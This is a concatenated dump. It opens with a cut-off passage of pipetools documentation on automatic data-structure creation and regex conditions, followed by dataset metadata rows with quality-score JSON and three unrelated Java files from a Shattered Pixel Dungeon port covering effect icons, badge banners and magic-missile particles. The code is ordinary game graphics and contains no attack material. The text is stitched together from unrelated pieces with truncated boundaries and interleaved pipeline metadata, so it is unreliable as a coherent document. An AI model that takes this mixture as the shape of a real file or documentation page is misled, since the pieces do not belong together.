:func:`~pipetools.decorators.pipe_util` decorator on it.
And optionally also :func:`~pipetools.decorators.auto_string_formatter` (see
:ref:`auto-string-formatting`) or
:func:`~pipetools.decorators.data_structure_builder`
(see :ref:`auto-ds-creation`) if it makes sense.
.. _auto-ds-creation:
Automatic data-structure creation
---------------------------------
Some of the utils, most importantly :func:`foreach`, offer a shortcut for
creating basic python data structures - ``list``, ``tuple`` and ``dict``.
It works like this (the ``| list`` at the end is just so we can see the result,
otherwise it would just give us ``<iterable thing at 0xasdf123>``)::
>>> range(5) > foreach({X: X * 2}) | list
[{0: 0}, {1: 2}, {2: 4}, {3: 6}, {4: 8}]
>>> range(5) > foreach([X, X * '★']) | list
[[0, ''], [1, '★'], [2, '★★'], [3, '★★★'], [4, '★★★★']]
It can also be combined with string formatting::
>>> names = [('John', 'Matrix'), ('Jack', 'Slater')]
>>> names > foreach({'name': "{0} {1}", 'initials': '{0[0]}. {1[0]}.'}) | list
[{'initials': 'J. M.', 'name': 'John Matrix'},
{'initials': 'J. S.', 'name': 'Jack Slater'}]
.. _auto-regex:
Automatic regex conditions
--------------------------
If you use a string instead of a function as a condition in
:func:`~pipetools.utils.where`, :func:`~pipetools.utils.where_not`,
:func:`~pipetools.utils.select_first` or :func:`~pipetools.utils.take_until` the
string will be used as a regex to match the input against. This will, of course,
work only if the items of the input sequence are strings.
Essentially::
where(r'^some\-regexp?$')
is equivalent to::
where(re.match, r'^some\-regexp?$')
As of ``0.3.2`` this also filters out ``None`` values instead of throwing an
exception. Making it equivalent to::
where(maybe | (re.match, r'^some\-regexp?$'))
If you want to easily add this functionality to your own functions, you can use
the :func:`~pipetools.decorators.regex_condition` decorator.
| 3,197 | pipeutils | rst | en | restructuredtext | text | {"qsc_doc_frac_chars_curly_bracket": 0.00813262, "qsc_doc_frac_words_redpajama_stop": 0.25168237, "qsc_doc_num_sentences": 51.0, "qsc_doc_num_words": 478, "qsc_doc_num_chars": 3197.0, "qsc_doc_num_lines": 105.0, "qsc_doc_mean_word_length": 4.43933054, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.44351464, "qsc_doc_entropy_unigram": 5.01893408, "qsc_doc_frac_words_all_caps": 0.01211306, "qsc_doc_frac_lines_dupe_lines": 0.0, "qsc_doc_frac_chars_dupe_lines": 0.0, "qsc_doc_frac_chars_top_2grams": 0.04901037, "qsc_doc_frac_chars_top_3grams": 0.04335533, "qsc_doc_frac_chars_top_4grams": 0.0131951, "qsc_doc_frac_chars_dupe_5grams": 0.04806786, "qsc_doc_frac_chars_dupe_6grams": 0.0, "qsc_doc_frac_chars_dupe_7grams": 0.0, "qsc_doc_frac_chars_dupe_8grams": 0.0, "qsc_doc_frac_chars_dupe_9grams": 0.0, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 18.6196319, "qsc_doc_frac_chars_hyperlink_html_tag": 0.01188614, "qsc_doc_frac_chars_alphabet": 0.77149237, "qsc_doc_frac_chars_digital": 0.01414217, "qsc_doc_frac_chars_whitespace": 0.15952455, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Effects.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.watabou.noosa.Image;
public class Effects {
public enum Type {
RIPPLE,
LIGHTNING,
WOUND,
EXCLAMATION,
CHAIN,
DEATH_RAY,
LIGHT_RAY,
HEALTH_RAY
}
public static Image get( Type type ) {
Image icon = new Image( Assets.EFFECTS );
switch (type) {
case RIPPLE:
icon.frame(icon.texture.uvRect(0, 0, 16, 16));
break;
case LIGHTNING:
icon.frame(icon.texture.uvRect(16, 0, 32, 8));
break;
case WOUND:
icon.frame(icon.texture.uvRect(16, 8, 32, 16));
break;
case EXCLAMATION:
icon.frame(icon.texture.uvRect(0, 16, 6, 25));
break;
case CHAIN:
icon.frame(icon.texture.uvRect(6, 16, 11, 22));
break;
case DEATH_RAY:
icon.frame(icon.texture.uvRect(16, 16, 32, 24));
break;
case LIGHT_RAY:
icon.frame(icon.texture.uvRect(16, 23, 32, 31));
break;
case HEALTH_RAY:
icon.frame(icon.texture.uvRect(16, 30, 32, 38));
break;
}
return icon;
}
}
| 1,849 | Effects | java | en | java | code | {"qsc_code_num_words": 268, "qsc_code_num_chars": 1849.0, "qsc_code_mean_word_length": 4.74626866, "qsc_code_frac_words_unique": 0.46268657, "qsc_code_frac_chars_top_2grams": 0.05660377, "qsc_code_frac_chars_top_3grams": 0.08176101, "qsc_code_frac_chars_top_4grams": 0.12578616, "qsc_code_frac_chars_dupe_5grams": 0.24449686, "qsc_code_frac_chars_dupe_6grams": 0.20361635, "qsc_code_frac_chars_dupe_7grams": 0.07311321, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.04969367, "qsc_code_frac_chars_whitespace": 0.2055165, "qsc_code_size_file_byte": 1849.0, "qsc_code_num_lines": 69.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 26.79710145, "qsc_code_frac_chars_alphabet": 0.8162015, "qsc_code_frac_chars_comments": 0.42239048, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.17777778, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.02222222, "qsc_codejava_score_lines_no_logic": 0.11111111, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/BadgeBanner.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.watabou.noosa.Game;
import com.watabou.noosa.Image;
import com.watabou.noosa.TextureFilm;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.PointF;
public class BadgeBanner extends Image {
private enum State {
FADE_IN, STATIC, FADE_OUT
}
private State state;
private static final float DEFAULT_SCALE = 3;
private static final float FADE_IN_TIME = 0.2f;
private static final float STATIC_TIME = 1f;
private static final float FADE_OUT_TIME = 1.0f;
private int index;
private float time;
private static TextureFilm atlas;
private static BadgeBanner current;
private BadgeBanner( int index ) {
super( Assets.BADGES );
if (atlas == null) {
atlas = new TextureFilm( texture, 16, 16 );
}
this.index = index;
frame( atlas.get( index ) );
origin.set( width / 2, height / 2 );
alpha( 0 );
scale.set( 2 * DEFAULT_SCALE );
state = State.FADE_IN;
time = FADE_IN_TIME;
Sample.INSTANCE.play( Assets.SND_BADGE );
}
@Override
public void update() {
super.update();
time -= Game.elapsed;
if (time >= 0) {
switch (state) {
case FADE_IN:
float p = time / FADE_IN_TIME;
scale.set( (1 + p) * DEFAULT_SCALE );
alpha( 1 - p );
break;
case STATIC:
break;
case FADE_OUT:
alpha( time / FADE_OUT_TIME );
break;
}
} else {
switch (state) {
case FADE_IN:
time = STATIC_TIME;
state = State.STATIC;
scale.set( DEFAULT_SCALE );
alpha( 1 );
highlight( this, index );
break;
case STATIC:
time = FADE_OUT_TIME;
state = State.FADE_OUT;
break;
case FADE_OUT:
killAndErase();
break;
}
}
}
@Override
public void kill() {
if (current == this) {
current = null;
}
super.kill();
}
public static void highlight( Image image, int index ) {
PointF p = new PointF();
switch (index) {
case 0:
case 1:
case 2:
case 3:
p.offset( 7, 3 );
break;
case 4:
case 5:
case 6:
case 7:
p.offset( 6, 5 );
break;
case 8:
case 9:
case 10:
case 11:
p.offset( 6, 3 );
break;
case 12:
case 13:
case 14:
case 15:
p.offset( 7, 4 );
break;
case 16:
p.offset( 6, 3 );
break;
case 17:
p.offset( 5, 4 );
break;
case 18:
p.offset( 7, 3 );
break;
case 20:
p.offset( 7, 3 );
break;
case 21:
p.offset( 7, 3 );
break;
case 22:
p.offset( 6, 4 );
break;
case 23:
p.offset( 4, 5 );
break;
case 24:
p.offset( 6, 4 );
break;
case 25:
p.offset( 6, 5 );
break;
case 26:
p.offset( 5, 5 );
break;
case 27:
p.offset( 6, 4 );
break;
case 28:
p.offset( 3, 5 );
break;
case 29:
p.offset( 5, 4 );
break;
case 30:
p.offset( 5, 4 );
break;
case 31:
p.offset( 5, 5 );
break;
case 32:
case 33:
p.offset( 7, 4 );
break;
case 34:
p.offset( 6, 4 );
break;
case 35:
p.offset( 6, 4 );
break;
case 36:
p.offset( 6, 5 );
break;
case 37:
p.offset( 4, 4 );
break;
case 38:
p.offset( 5, 5 );
break;
case 39:
p.offset( 5, 4 );
break;
case 40:
case 41:
case 42:
case 43:
p.offset( 5, 4 );
break;
case 44:
case 45:
case 46:
case 47:
p.offset( 5, 5 );
break;
case 48:
case 49:
case 50:
case 51:
p.offset( 7, 4 );
break;
case 52:
case 53:
case 54:
case 55:
p.offset( 4, 4 );
break;
case 56:
p.offset( 3, 7 );
break;
case 57:
p.offset( 4, 5 );
break;
case 58:
p.offset( 6, 4 );
break;
case 59:
p.offset( 7, 4 );
break;
case 60:
case 61:
case 62:
case 63:
p.offset( 4, 4 );
break;
}
p.x *= image.scale.x;
p.y *= image.scale.y;
p.offset(
-image.origin.x * (image.scale.x - 1),
-image.origin.y * (image.scale.y - 1) );
p.offset( image.point() );
Speck star = new Speck();
star.reset( 0, p.x, p.y, Speck.DISCOVER );
star.camera = image.camera();
image.parent.add( star );
}
public static BadgeBanner show( int image ) {
if (current != null) {
current.killAndErase();
}
return (current = new BadgeBanner( image ));
}
public static Image image( int index ) {
Image image = new Image( Assets.BADGES );
if (atlas == null) {
atlas = new TextureFilm( image.texture, 16, 16 );
}
image.frame( atlas.get( index ) );
return image;
}
}
| 5,271 | BadgeBanner | java | en | java | code | {"qsc_code_num_words": 774, "qsc_code_num_chars": 5271.0, "qsc_code_mean_word_length": 4.04780362, "qsc_code_frac_words_unique": 0.28165375, "qsc_code_frac_chars_top_2grams": 0.10916055, "qsc_code_frac_chars_top_3grams": 0.05426109, "qsc_code_frac_chars_top_4grams": 0.01723588, "qsc_code_frac_chars_dupe_5grams": 0.27194382, "qsc_code_frac_chars_dupe_6grams": 0.22853495, "qsc_code_frac_chars_dupe_7grams": 0.02681136, "qsc_code_frac_chars_dupe_8grams": 0.02681136, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.05970149, "qsc_code_frac_chars_whitespace": 0.27546955, "qsc_code_size_file_byte": 5271.0, "qsc_code_num_lines": 290.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 18.17586207, "qsc_code_frac_chars_alphabet": 0.76067033, "qsc_code_frac_chars_comments": 0.14816923, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.35833333, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.02083333, "qsc_codejava_score_lines_no_logic": 0.075, "qsc_codejava_frac_words_no_modifier": 0.83333333, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/MagicMissile.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.CorrosionParticle;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.FlameParticle;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.LeafParticle;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.RainbowParticle;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.ShadowParticle;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.Visual;
import com.watabou.noosa.particles.Emitter;
import com.watabou.noosa.particles.PixelParticle;
import com.watabou.utils.Callback;
import com.watabou.utils.ColorMath;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
public class MagicMissile extends Emitter {
private static final float SPEED = 200f;
private Callback callback;
private PointF to;
private float sx;
private float sy;
private float time;
//missile types
public static final int MAGIC_MISSILE = 0;
public static final int FROST = 1;
public static final int FIRE = 2;
public static final int CORROSION = 3;
public static final int FOLIAGE = 4;
public static final int FORCE = 5;
public static final int BEACON = 6;
public static final int SHADOW = 7;
public static final int RAINBOW = 8;
public static final int EARTH = 9;
public static final int WARD = 10;
public static final int FIRE_CONE = 100;
public static final int FOLIAGE_CONE = 101;
public void reset( int type, int from, int to, Callback callback ) {
reset( type,
DungeonTilemap.raisedTileCenterToWorld( from ),
DungeonTilemap.raisedTileCenterToWorld( to ),
callback );
}
public void reset( int type, Visual from, Visual to, Callback callback ) {
reset( type,
from.center(),
to.center(),
callback);
}
public void reset( int type, Visual from, int to, Callback callback ) {
reset( type,
from.center(),
DungeonTilemap.raisedTileCenterToWorld( to ),
callback);
}
public void reset( int type, PointF from, PointF to, Callback callback ) {
this.callback = callback;
revive();
this.to = to;
x = from.x;
y = from.y;
width = 0;
height = 0;
PointF d = PointF.diff( to, from );
PointF speed = new PointF( d ).normalize().scale( SPEED );
sx = speed.x;
sy = speed.y;
time = d.length() / SPEED;
switch(type){
case MAGIC_MISSILE: default:
size( 4 );
pour( WhiteParticle.FACTORY, 0.01f );
break;
case FROST:
pour( MagicParticle.FACTORY, 0.01f );
break;
case FIRE:
size( 4 );
pour( FlameParticle.FACTORY, 0.01f );
break;
case CORROSION:
size( 3 );
pour( CorrosionParticle.MISSILE, 0.01f );
break;
case FOLIAGE:
size( 4 );
pour( LeafParticle.GENERAL, 0.01f );
break;
case FORCE:
pour( SlowParticle.FACTORY, 0.01f );
break;
case BEACON:
pour( ForceParticle.FACTORY, 0.01f );
break;
case SHADOW:
size( 4 );
pour( ShadowParticle.MISSILE, 0.01f );
break;
case RAINBOW:
size( 4 );
pour( RainbowParticle.BURST, 0.01f );
break;
case EARTH:
size( 4 );
pour( EarthParticle.FACTORY, 0.01f );
break;
case WARD:
size( 4 );
pour( WardParticle.FACTORY, 0.01f );
break;
case FIRE_CONE:
size( 10 );
pour( FlameParticle.FACTORY, 0.03f );
break;
case FOLIAGE_CONE:
size( 10 );
pour( LeafParticle.GENERAL, 0.03f );
break;
}
}
public void size( float size ) {
x -= size / 2;
y -= size / 2;
width = height = size;
}
public void setSpeed( float newSpeed ){
PointF d = PointF.diff( to, new PointF(x, y) );
PointF speed = new PointF( d ).normalize().scale( newSpeed );
sx = speed.x;
sy = speed.y;
time = d.length() / newSpeed;
}
//convenience method for the common case of a bolt going from a character to a tile or enemy
public static MagicMissile boltFromChar(Group group, int type, Visual sprite, int to, Callback callback){
MagicMissile missile = ((MagicMissile)group.recycle( MagicMissile.class ));
if (Actor.findChar(to) != null){
missile.reset(type, sprite.center(), Actor.findChar(to).sprite.destinationCenter(), callback);
} else {
missile.reset(type, sprite, to, callback);
}
return missile;
}
@Override
public void update() {
super.update();
if (on) {
float d = Game.elapsed;
x += sx * d;
y += sy * d;
if ((time -= d) <= 0) {
on = false;
if (callback != null ) callback.call();
}
}
}
public static class MagicParticle extends PixelParticle {
public static final Emitter.Factory FACTORY = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((MagicParticle)emitter.recycle( MagicParticle.class )).reset( x, y );
}
@Override
public boolean lightMode() {
return true;
}
};
public static final Emitter.Factory ATTRACTING = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((MagicParticle)emitter.recycle( MagicParticle.class )).resetAttract( x, y );
}
@Override
public boolean lightMode() {
return true;
}
};
public MagicParticle() {
super();
color( 0x88CCFF );
lifespan = 0.5f;
speed.set( Random.Float( -10, +10 ), Random.Float( -10, +10 ) );
}
public void reset( float x, float y ) {
revive();
this.x = x;
this.y = y;
left = lifespan;
}
public void resetAttract( float x, float y) {
revive();
//size = 8;
left = lifespan;
speed.polar( Random.Float( PointF.PI2 ), Random.Float( 16, 32 ) );
this.x = x - speed.x * lifespan;
this.y = y - speed.y * lifespan;
}
@Override
public void update() {
super.update();
// alpha: 1 -> 0; size: 1 -> 4
size( 4 - (am = left / lifespan) * 3 );
}
}
public static class EarthParticle extends PixelParticle.Shrinking {
public static final Emitter.Factory FACTORY = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((EarthParticle)emitter.recycle( EarthParticle.class )).reset( x, y );
}
};
public static final Emitter.Factory BURST = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((EarthParticle)emitter.recycle( EarthParticle.class )).resetBurst( x, y );
}
};
public static final Emitter.Factory ATTRACT = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((EarthParticle)emitter.recycle( EarthParticle.class )).resetAttract( x, y );
}
};
public EarthParticle() {
super();
lifespan = 0.5f;
acc.set( 0, +40 );
}
public void reset( float x, float y ) {
revive();
this.x = x;
this.y = y;
left = lifespan;
size = 4;
if (Random.Int(10) == 0){
color(ColorMath.random(0xFFF568, 0x80791A));
} else {
color(ColorMath.random(0x805500, 0x332500));
}
speed.set( Random.Float( -10, +10 ), Random.Float( -10, +10 ) );
}
public void resetBurst( float x, float y ){
reset(x, y);
speed.polar( Random.Float( PointF.PI2 ), Random.Float( 40, 60 ) );
}
public void resetAttract( float x, float y ){
reset(x, y);
speed.polar( Random.Float( PointF.PI2 ), Random.Float( 24, 32 ) );
this.x = x - speed.x * lifespan;
this.y = y - speed.y * lifespan;
acc.set( 0, 0 );
}
}
public static class WhiteParticle extends PixelParticle {
public static final Emitter.Factory FACTORY = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((WhiteParticle)emitter.recycle( WhiteParticle.class )).reset( x, y );
}
@Override
public boolean lightMode() {
return true;
}
};
public WhiteParticle() {
super();
lifespan = 0.4f;
am = 0.5f;
}
public void reset( float x, float y ) {
revive();
this.x = x;
this.y = y;
left = lifespan;
}
@Override
public void update() {
super.update();
// size: 3 -> 0
size( (left / lifespan) * 3 );
}
}
public static class SlowParticle extends PixelParticle {
private Emitter emitter;
public static final Emitter.Factory FACTORY = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((SlowParticle)emitter.recycle( SlowParticle.class )).reset( x, y, emitter );
}
@Override
public boolean lightMode() {
return true;
}
};
public SlowParticle() {
super();
lifespan = 0.6f;
color( 0x664422 );
size( 2 );
}
public void reset( float x, float y, Emitter emitter ) {
revive();
this.x = x;
this.y = y;
this.emitter = emitter;
left = lifespan;
acc.set( 0 );
speed.set( Random.Float( -20, +20 ), Random.Float( -20, +20 ) );
}
@Override
public void update() {
super.update();
am = left / lifespan;
acc.set( (emitter.x - x) * 10, (emitter.y - y) * 10 );
}
}
public static class ForceParticle extends PixelParticle.Shrinking {
public static final Emitter.Factory FACTORY = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((ForceParticle)emitter.recycle( ForceParticle.class )).reset( index, x, y );
}
};
public void reset( int index, float x, float y ) {
super.reset( x, y, 0xFFFFFF, 8, 0.5f );
speed.polar( PointF.PI2 / 8 * index, 12 );
this.x -= speed.x * lifespan;
this.y -= speed.y * lifespan;
}
@Override
public void update() {
super.update();
am = (1 - left / lifespan) / 2;
}
}
public static class WardParticle extends PixelParticle.Shrinking {
public static final Emitter.Factory FACTORY = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((WardParticle)emitter.recycle( WardParticle.class )).reset( x, y );
}
@Override
public boolean lightMode() {
return true;
}
};
public static final Emitter.Factory UP = new Factory() {
@Override
public void emit( Emitter emitter, int index, float x, float y ) {
((WardParticle)emitter.recycle( WardParticle.class )).resetUp( x, y );
}
@Override
public boolean lightMode() {
return true;
}
};
public WardParticle() {
super();
lifespan = 0.6f;
color( 0x8822FF );
}
public void reset( float x, float y ) {
revive();
this.x = x;
this.y = y;
left = lifespan;
size = 8;
}
public void resetUp( float x, float y){
reset(x, y);
speed.set( Random.Float( -8, +8 ), Random.Float( -32, -48 ) );
}
@Override
public void update() {
super.update();
am = 1 - left / lifespan;
}
}
}
| 11,885 | MagicMissile | java | en | java | code | {"qsc_code_num_words": 1465, "qsc_code_num_chars": 11885.0, "qsc_code_mean_word_length": 5.17406143, "qsc_code_frac_words_unique": 0.1665529, "qsc_code_frac_chars_top_2grams": 0.04221636, "qsc_code_frac_chars_top_3grams": 0.05158311, "qsc_code_frac_chars_top_4grams": 0.03166227, "qsc_code_frac_chars_dupe_5grams": 0.53548813, "qsc_code_frac_chars_dupe_6grams": 0.47796834, "qsc_code_frac_chars_dupe_7grams": 0.40699208, "qsc_code_frac_chars_dupe_8grams": 0.34551451, "qsc_code_frac_chars_dupe_9grams": 0.33034301, "qsc_code_frac_chars_dupe_10grams": 0.29234828, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02524185, "qsc_code_frac_chars_whitespace": 0.24333193, "qsc_code_size_file_byte": 11885.0, "qsc_code_num_lines": 492.0, "qsc_code_num_chars_line_max": 107.0, "qsc_code_num_chars_line_mean": 24.15650407, "qsc_code_frac_chars_alphabet": 0.81763594, "qsc_code_frac_chars_comments": 0.07942785, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.4197861, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00584956, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.10427807, "qsc_codejava_score_lines_no_logic": 0.18449198, "qsc_codejava_frac_words_no_modifier": 0.975, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, 